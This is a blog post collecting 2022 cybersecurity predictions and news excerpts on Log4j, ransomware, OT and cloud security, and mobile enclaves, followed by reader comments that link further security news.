Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
Microsoft starts killing off WMIC in Windows, will thwart attacks
https://www.bleepingcomputer.com/news/microsoft/microsoft-starts-killing-off-wmic-in-windows-will-thwart-attacks/
Tomi Engdahl says:
Russian APT Hackers Used COVID-19 Lures to Target European Diplomats
https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html
Tomi Engdahl says:
https://www.facebook.com/groups/shahidzafar/permalink/5132916256727460/
What’s a good open-source vulnerability scanner that you’ve used and would recommend. I’ve mostly used proprietary tools like Qualys, Nessus but would like to recommend a tool(preferably free) for a small local business.
Last time i checked Rapid7 Nexpose was available for free and up to 32 ip’s. Not open source but still a good scanner
Depends on the number of hosts you need to scan.
Nessus essentials will do up to 16.
Otherwise look at openvas.
if they need more than 16 then they can afford premium.
apart frm qualys ,nessus ty–> metasploit framework or burp suite
Alien OTX have an offering as well. Can’t think what it’s called now think it’s OSSM
I don’t use scanners. They’re noisy and really don’t provide concise information… but mostly because they are noisy and easy to detect.
Nessus is the non-free fork of Openvas (Greenbone), So just use Openvas.
Tomi Engdahl says:
An open-source tool for software security
https://news.mit.edu/2022/r2c-software-security-0210
The startup r2c, founded by MIT alumni, offers a database of software security checks to simplify the process of securing code.
Tomi Engdahl says:
Why are cybersecurity asset management startups so hot right now?
https://techcrunch.com/2022/02/11/why-are-internet-asset-startups-so-hot-right-now/
In the world of cybersecurity, you can’t secure something if you don’t know it’s there.
Enter cybersecurity asset management, an admittedly unsexy fragment of the booming industry that investors have shown an ever-increasing appetite for over the past 18 months.
The cybersecurity industry experienced what is being hailed by some as a “golden year” — funding for cyber startups climbed by 138% to $29.5 billion in 2021 and M&A activity skyrocketed by more than 294% to $77.5 billion. And those focused on securing an organization’s internet-facing assets have received more attention than most.
Tomi Engdahl says:
Privacy Preserving Attribution for Advertising
https://blog.mozilla.org/en/mozilla/privacy-preserving-attribution-for-advertising/
Advertising provides critical support for the Web. We’ve been looking to apply privacy preserving advertising technology to the attribution problem, so that advertisers can get answers to important questions without harming privacy.
Attribution is how advertisers know if their advertising campaigns are working. Attribution generates metrics that allow advertisers to understand how their advertising campaigns are performing. Related measurement techniques also help publishers understand how they are helping advertisers. Though attribution is crucial to advertising, current attribution practices have terrible privacy properties.
Tomi Engdahl says:
https://cybersecuritymate.com/secure-cloud-computing/
Tomi Engdahl says:
https://www.techrepublic.com/article/hybrid-work-and-the-great-resignation-lead-to-cybersecurity-concerns/
Tomi Engdahl says:
What your smart TV knows about you – and how to stop it harvesting data
Modern TVs gather data that can be monetised. How much of this surveillance can you avoid without turning your smart TV dumb?
https://www.theguardian.com/technology/2022/jan/29/what-your-smart-tv-knows-about-you-and-how-to-stop-it-harvesting-data
Tomi Engdahl says:
IT security: Computer attacks with laser light
LaserShark: KIT Researchers demonstrate hidden communication into air-gapped computer systems – data transmitted to light-emitting diodes of regular office devices
https://www.eurekalert.org/news-releases/938649
Tomi Engdahl says:
Senators: CIA has secret program that collects American data https://www.washingtonpost.com/politics/senators-cia-has-secret-program-that-collects-american-data/2022/02/10/017b6932-8ad8-11ec-838f-0cfdf69cce3c_story.html
The CIA has a secret, undisclosed data repository that includes information collected about Americans, two Democrats on the Senate Intelligence Committee said. While neither the agency nor lawmakers would disclose specifics about the data, the senators alleged the CIA had long hidden details about the program from the public and Congress.
Tomi Engdahl says:
- -a-decade/
https://www.bleepingcomputer.com/news/security/hacking-group-modifiedelephant-evaded-discovery-forHacking
Researchers at SentinelLabs in a report today detail the tactics of ModifiedElephant explaining how recently published evidence helped them attribute previously “orphan” attacks. [..]The SentinelLabs report makes several correlations between the timing of specific ModifiedElephant attacks and the arrest of targets that followed shortly after. This coincidence, combined with the targeting scope, which aligns with the interests of the Indian state, constructs a very probable hypothesis that the hackers are sponsored by circles of India’s official administration. Freedom of speech activists and academics aren’t targeted for financial purposes, so these attacks always have an underlying political nuance. Myös:
https://thehackernews.com/2022/02/hackers-planted-fake-digital-evidence.html.
https://therecord.media/jailed-indian-activist-was-targeted-by-state-linked-hacking-group-report-says/
Tomi Engdahl says:
Sharp SIM-Swapping Spike Causes $68M in Losses https://threatpost.com/sharp-sim-swapping-spike-losses/178358/
SIM-swapping the practice of duping mobile carriers into switching a target’s phone services to an attacker-controlled phone is on the rise, the Feds are warning leading to millions in losses for consumers who found their bank accounts drained and other accounts taken over.
Tomi Engdahl says:
US nuclear power plants contain dangerous counterfeit parts, report finds https://www.theverge.com/2022/2/11/22929255/us-nuclear-power-plants-dangerous-counterfeit-parts-nrc-report
At least some nuclear power plants in the US contain counterfeit parts that could pose significant risks, an investigation by the inspector general’s office of the Nuclear Regulatory Commission has found. Those parts “present nuclear safety and security concerns that could have serious consequences, ” says the resulting report published on February 9th.
Tomi Engdahl says:
Google pakotti muutoksen 150 miljoonalle ihmiselle näin kävi https://www.is.fi/digitoday/tietoturva/art-2000008604246.html
GOOGLE kertoo läpi ajamastaan tietoturvamuutoksesta. Yhtiö laittoi viime vuonna kaksivaiheisen vahvistuksen päälle yli 150 miljoonalle Google-tilin omistajalle, ja seuraukset ovat yhtiön mukaan huomattavat. “Tämän hankkeen tuloksena olemme nähneet 50 prosentin pudotuksen murrettujen tilien määrässä”, johtaja Jen Fitzpatrick kirjoittaa.
Tomi Engdahl says:
Linux malware attacks are on the rise, and businesses aren’t ready for it https://www.zdnet.com/article/linux-malware-attacks-are-on-the-rise-and-businesses-arent-ready-for-it/
Cyber criminals are increasingly targeting Linux servers and cloud infrastructure to launch ransomware campaigns, cryptojacking attacks and other illicit activity and many organisations are leaving themselves open to attacks because Linux infrastructure is misconfigured or poorly managed. Alkup.
https://www.vmware.com/resources/security/exposing-malware-in-multi-cloud.html
Tomi Engdahl says:
Apple plans AirTag updates to curb unwanted tracking https://edition.cnn.com/2022/02/10/tech/airtag-safety-updates/index.html
Apple (AAPL) said Thursday it plans to add more safeguards to AirTags to cut down on unwanted tracking following reports that the devices have been used to stalk people and steal cars. In a blog post, Apple said it has worked with safety groups and law enforcement agencies to identify more ways to update its AirTag safety warnings, including alerting people sooner if the small Bluetooth tracker is suspected to be tracking someone. (Right now, it can take hours for an AirTag to chirp if it has been separated from its owner.). Alkup.
https://www.apple.com/newsroom/2022/02/an-update-on-airtag-and-unwanted-tracking/
Tomi Engdahl says:
SHA256
There’s something very satisfying about finally understanding an algorithm that your computer uses every day for encryption. If you’re reading this, you’re probably similarly intrigued by algorithms. I present the step-by-step SHA256 visualizer.
https://sha256algorithm.com/
Tomi Engdahl says:
Feds Oppose Immediate Release of Voting Machine Report
https://www.securityweek.com/feds-oppose-immediate-release-voting-machine-report
A federal cybersecurity agency is reviewing a report that alleges security vulnerabilities in voting machines used by Georgia and other states and says the document shouldn’t be made public until the agency has had time to assess and mitigate potential risks.
The report has been under seal since July in federal court in Atlanta, part of a long-running lawsuit challenging Georgia’s voting machines. Its author, J. Alex Halderman, said in sworn declarations filed publicly with the court that he examined the Dominion Voting Systems machines for 12 weeks and identified “multiple severe security flaws” that would allow bad actors to install malicious software.
Plaintiffs in the case, who are election security advocates and individual voters, have for months called for the release of a redacted version of the report and urged that it be shared with state and federal election security officials. Lawyers for the state had repeatedly objected to those requests, but Secretary of State Brad Raffensperger last month put out a news release calling for its release.
Tomi Engdahl says:
Google Paid Out $8.7 Million in Bug Bounty Rewards in 2021
https://www.securityweek.com/google-paid-out-87-million-bug-bounty-rewards-2021
Tomi Engdahl says:
Lawmakers Introduce Combined Bill for Strengthening Critical Infrastructure Security
https://www.securityweek.com/lawmakers-introduce-combined-bill-strengthening-critical-infrastructure-security
U.S. senators Gary Peters (D-MI) and Rob Portman (R-OH) this week introduced a legislative package whose goal is to strengthen the cybersecurity of critical infrastructure and government networks.
The package, named Strengthening American Cybersecurity Act, combines three bills introduced in the fall of 2021: the Cyber Incident Reporting Act, the Federal Information Security Modernization Act of 2021, and the Federal Secure Cloud Improvement and Jobs Act.
If the bill becomes law, critical infrastructure owners and operators, as well as civilian federal agencies, will be required to inform the Cybersecurity and Infrastructure Security Agency (CISA) of any significant cyberattack within 72 hours.
Tomi Engdahl says:
The SASE Conversation in 2022, a Resolution for the Future
https://www.securityweek.com/sase-conversation-2022-resolution-future
Protecting Cryptocurrencies and NFTs – What’s Old is New
https://www.securityweek.com/protecting-cryptocurrencies-and-nfts-whats-old-new
Tomi Engdahl says:
Tripwire for Real War? Cyber’s Fuzzy Rules of Engagement
https://www.securityweek.com/tripwire-real-war-cybers-fuzzy-rules-engagement
If the West were to respond harshly to Russian aggression, Moscow could retaliate against NATO nations in cyberspace with an intensity and on a scale previously unseen
President Joe Biden couldn’t have been more blunt about the risks of cyberattacks spinning out of control. “If we end up in a war, a real shooting war with a major power, it’s going to be as a consequence of a cyber breach of great consequence,” he told his intelligence brain trust in July.
Now tensions are soaring over Ukraine with Western officials warning about the danger of Russia launching damaging cyberattacks against Ukraine’s NATO allies. While no one is suggesting that could lead to a full-blown war between nuclear-armed rivals, the risk of escalation is serious.
The danger is in the uncertainty about what crosses a digital red line. Cyberattacks, including those that cripple critical infrastructure with ransomware, have been on the rise for years and often go unpunished. It’s unclear how grave a malicious cyber operation by a state actor would have to be to cross the threshold to an act of war.
“The rules are fuzzy,” said Max Smeets, director of the European Cyber Conflict Research Initiative. “It’s not clear what is allowed, what isn’t allowed.”
Tomi Engdahl says:
15 NEW PROHIBITED GADGETS FROM ALIEXPRESS & AMAZON 2021 | FORBIDDEN PRODUCTS. TOOLS
https://www.youtube.com/watch?v=oRBj_AJiiRM
Tomi Engdahl says:
Hacking group framing targets for crimes.
A Hacker Group Has Been Framing People for Crimes They Didn’t Commit
https://gizmodo.com/a-hacker-group-has-been-framing-people-for-crimes-they-1848522497
A recent study shows the tactics and techniques of a cybercrime group that is known for planting incriminating evidence on the devices of activists in India.
For at least a decade, a shadowy hacker group has been targeting people throughout India, sometimes using its digital powers to plant fabricated evidence of criminal activity on their devices. That phony evidence has, in turn, often provided a pretext for the victims’ arrest.
ModifiedElephant APT and a Decade of Fabricating Evidence
https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/
Tomi Engdahl says:
FBI: BlackByte ransomware breached US critical infrastructure https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/
The US Federal Bureau of Investigation (FBI) revealed that the BlackByte ransomware group has breached the networks of at least three organizations from US critical infrastructure sectors in the last three months. This was disclosed in a TLP:WHITE joint cybersecurity advisory released Friday in coordination with the US Secret Service.
Alkup. https://www.ic3.gov/Media/News/2022/220211.pdf
Tomi Engdahl says:
74% of ransomware revenue goes to Russia-linked hackers
https://www.bbc.com/news/technology-60378009
New analysis suggests that 74% of all money made through ransomware attacks in 2021 went to Russia-linked hackers.
Tomi Engdahl says:
Over 28,000 Vulnerabilities Disclosed in 2021: Report
https://www.securityweek.com/over-28000-vulnerabilities-disclosed-2021-report
Risk Based Security on Monday released its vulnerability report for 2021 and revealed that a record-breaking 28,695 flaws were disclosed last year, which represents a significant increase from the 23,269 disclosed in 2020.
Of the vulnerabilities disclosed in 2021, more than 4,100 are remotely exploitable, have a public exploit available, and also have a patch or mitigation. By focusing on these security holes first, organizations could reduce risk by 86%, according to the vulnerability and data breach intelligence company.
On the other hand, to put that 4,100 into context, the known exploited vulnerabilities catalog maintained by CISA, which tracks issues disclosed over the past decade, only contains 360 entries.
The COVID-19 pandemic appears to have had some impact on vulnerability disclosures, starting with the first quarter of 2020, when there was a significantly lower number of disclosures. Risk Based Security (RBS) also noticed that disclosures slowed down in the first half of 2021, but they picked up in the second half of the year.
“In the 2021 Mid Year 2021 Report, the difference between 2020 and 2021 was only around 400. In the second half of the year, that gap then increased by over 3,500,” the company said in its latest report. “This is a considerable increase, further lending to the idea that we are seeing the disclosure landscape shake off the pandemic as researchers return to their normal output.”
Tomi Engdahl says:
Työkalu löytyy aukot avoimesta lähdekoodista
https://etn.fi/index.php/13-news/13177-tyoekalu-loeytyy-aukot-avoimesta-laehdekoodista
EDA-talo Synopsys on lanseerannut koodin tietoturvavirheiden löytämiseen ja korjaamiseen kehitety Code Sight -työkalun erillisenä työkaluna integroituihin kehitysympäristöihin (IDE). Sen avulla kehittäjät voivat nopeasti löytää ja korjata esimerkiksi lähdekoodin tietoturvaviat ja avoimen lähdekoodin riippuvuudet ennen kuin koodi lyödään lukkoon.
Code Sight Standard Edition hyödyntää Synopsysin Rapid Scan Static- ja Rapid Scan SCA -teknologiaa, Se on käytännössä sovellus, joka tekee nopeasti koodin tietoturva-analyysin suorana kehittäjän omassa IDE-ympäristössä. Tällä voidaan välttää kalliit uudelleentyöstöt, jotka aiheutuvat myöhemmin ohjelmistokehityksen elinkaaren aikana havaituista ongelmista.
Antamalla kehittäjille mahdollisuuden korjata tietoturvaviat koodauksen aikana, Code Sight Standard Edition vähentää myöhemmän vaiheen tietoturvatestauksen kuormitusta ja minimoi kalliita korjauksia ongelmien korjaamiseksi, kun kehittäjät ovat siirtyneet muihin projekteihin.
Tomi Engdahl says:
‘Don’t Be Google’: The Rise of Privacy Focused Startups
https://www.securityweek.com/dont-be-google-rise-privacy-focused-startups
Google once used the slogan “don’t be evil” to distinguish itself from its competitors, but now a growing number of pro-privacy startups are rallying to the mantra “don’t be Google”.
They are taking on Google Analytics, a product used by more than half of the world’s websites to understand people’s browsing habits.
“Google made a lot of good tools for a lot of people,” says Marko Saric, a Dane living in Belgium who set up Plausible Analytics in Estonia in 2019.
“But over the years they changed their approach without really thinking what is right, what is wrong, what is evil, what is not.”
Saric and many others are benefitting from GDPR, a European privacy regulation introduced in 2018 to control who can access personal data.
Last week, France followed Austria in declaring Google’s practice of transferring personal data from the EU to its US servers was illegal under GDPR because the country does not have adequate protections.
Google disagrees, saying the data is anonymised and the scenarios envisaged in Europe are hypothetical.
Nevertheless, startups see an opening in a true David vs Goliath battle.
“The week that Google Analytics was ruled illegal by the Austrian DPA (data protection authority) was a good week for us,” says Paul Jarvis, who runs Fathom Analytics from his home in Vancouver Island, Canada.
Tomi Engdahl says:
Ensimmäinen kvanttikonehyökkäykset kestävä turvasiru
https://etn.fi/index.php/13-news/13180-ensimmaeinen-kvanttikonehyoekkaeykset-kestaevae-turvasiru
Tietokoneissa on jo pitkän aikaa hyödynnetty TPM-turvamoduuleja, johon laitteen ja käyttäjän kannalta sensitiivinen data avaimineen tallennetaan. Infineon on nyt vienyt TPM-suojauksen pitkän askeleen pidemmälle.
Yhtiö on esitellyt uuden OPTIGA-moduulin. SLB 9672 -moduuli on varustettu tulevaisuuden kestävällä tietoturvaratkaisulla, jossa on kvanttitason salaus. Lisäksi laiteohjelmiston päivitysmekanismi käyttää 256-bittisiä XMSS-allekirjoituksia.
